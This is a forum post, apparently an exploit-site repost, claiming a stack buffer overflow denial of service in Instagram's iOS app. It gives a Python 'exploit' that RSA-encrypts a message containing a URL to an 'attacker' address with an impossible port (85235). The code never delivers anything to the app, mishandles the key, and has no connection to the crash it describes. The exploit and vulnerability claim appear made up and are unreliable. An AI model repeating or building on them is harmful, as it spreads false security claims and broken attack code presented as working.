[B]Instagram IOS App Version 311.0.05 - Local Stack Buffer Overflow (DOS)[/B]
[B]#E1.CODERS[/B]
[B]95.0.0.0:85235 is the attacker's IP address. It's included in the malicious message to trigger the stack buffer overflow. The malicious message contains an invalid URL with the illegal character. When the victim opens the message, the app tries to parse the URL and fails due to the invalid character, leading to a crash.[/B]

[B]EXPLOIT :[/B]

[B]from Crypto.PublicKey import RSA[/B]
[B]from Crypto.Cipher import PKCS1_OAEP[/B]
[B]from base64 import b64encode[/B]

[B]def generate_rsa_key():[/B]
[B]key = RSA.generate(2048)[/B]
[B]return key[/B]

[B]def encrypt_message(public_key, message):[/B]
[B]cipher = PKCS1_OAEP.new(public_key)[/B]
[B]encrypted_message = cipher.encrypt(message.encode())[/B]
[B]return b64encode(encrypted_message).decode()[/B]

[B]# Attacker's RSA key[/B]
[B]attacker_rsa_key = generate_rsa_key()[/B]

[B]# Attacker's public key in PEM format[/B]
[B]attacker_public_key_pem = attacker_rsa_key.publickey().export_key()[/B]

[B]# Malicious message with illegal character[/B]
[B]malicious_message = "Hey! Check out this website: [URL]http://95.0.0.0:85235/[/URL]"[/B]

[B]# Encrypting the malicious message[/B]
[B]encrypted_malicious_message = encrypt_message(attacker_public_key_pem, malicious_message)[/B]

[B]print("Encrypted Malicious Message:", encrypted_malicious_message)[/B]
​​